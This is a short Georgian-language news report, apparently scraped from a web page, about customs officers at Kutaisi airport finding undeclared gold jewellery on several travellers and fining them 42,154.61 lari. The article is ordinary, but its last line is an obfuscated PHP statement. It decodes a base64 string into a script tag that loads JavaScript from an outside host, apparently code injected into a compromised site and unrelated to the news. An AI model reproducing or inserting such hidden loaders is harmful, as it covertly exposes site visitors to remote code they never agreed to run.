celsiusi
ავერსი საქკაბელი
შემოსავლების სამსახურის ცნობით, ქუთაისის აეროპორტში არადეკლარირებული ოქროს ნაკეთობების შემოტანის ფაქტები აღიკვეთა.
 
„ფინანსთა სამინისტროს შემოსავლების სამსახურის საბაჟო გამშვებ პუნქტში „ქუთაისის აეროპორტი“, მებაჟე ოფიცრების მიერ, ეჭვის საფუძველზე, საქართველოს, ყაზახეთისა და საბერძნეთის მოქალაქეების, როგორც ფიზიკური, ასევე კუთვნილი ბარგის დათვალიერების შედეგად, არადეკლარირებული ოქროს საიუველირო ნაკეთობები (საერთო წონა – 524,94 გრამი) გამოვლინდა. არადეკლარირებული საქონლის საერთო საბაჟო ღირებულებამ 42 154,61 ლარი შეადგინა.
 
საქართველოს საბაჟო კოდექსის 168-ე მუხლის პირველი ნაწილის შესაბამისად, კანონდამრღვევ მოქალაქეებს, სანქციის სახით ჯარიმა, ჯამში 42 154,61 ლარის ოდენობით შეეფარდათ“, – აცხადებენ უწყებაში.
640
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");